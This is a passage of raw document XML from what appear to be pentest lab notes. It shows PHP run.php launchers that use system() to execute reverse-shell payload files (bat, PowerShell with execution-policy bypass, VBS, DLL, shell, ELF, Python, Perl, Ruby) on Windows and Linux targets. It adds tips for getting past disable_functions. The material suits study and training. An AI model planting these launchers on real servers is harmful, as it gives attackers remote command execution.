          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtxerge15sus" w:id="127"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What run.php looks like for non .exe payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is purely theoretical, but if we wanted to use a payload other than .exe, for example against a Linux Machine, then maybe we can edit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look like this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Widows Targets</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bat file (Batch script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F02">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('cmd /c reverse.bat', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F03">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F04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps1 file (PowerShell script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F05">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F06">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('powershell -ExecutionPolicy Bypass -File reverse.ps1', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F07">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F08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vbs file (VBScript)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F09">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('wscript.exe reverse.vbs', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dll file (DLL executed via rundll32)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assumes the DLL has an exported function like main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('rundll32 reverse.dll,main', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F10">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F11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F13">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F14">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.sh file (Shell script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F16">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('bash reverse.sh', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F18">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if it's executable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('./reverse.sh', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ELF binary (compiled Linux executable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('./reverse', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F21">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.py file (Python script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F24">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F25">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('python3 reverse.py', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F26">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.pl file (Perl script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F29">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('perl reverse.pl', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.rb file (Ruby script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('ruby reverse.rb', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F30">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F31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always make sure the interpreter (python3, perl, bash, etc.) exists on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can check phpinfo() for disable_functions that may block system(). Alternatives like exec(), shell_exec(), or popen() may work instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux/Unix, if the file is not executable, you may need to chmod +x it before running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F36">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7kg721mpt8tp" w:id="128"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What upload.php looks like for non-php languages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
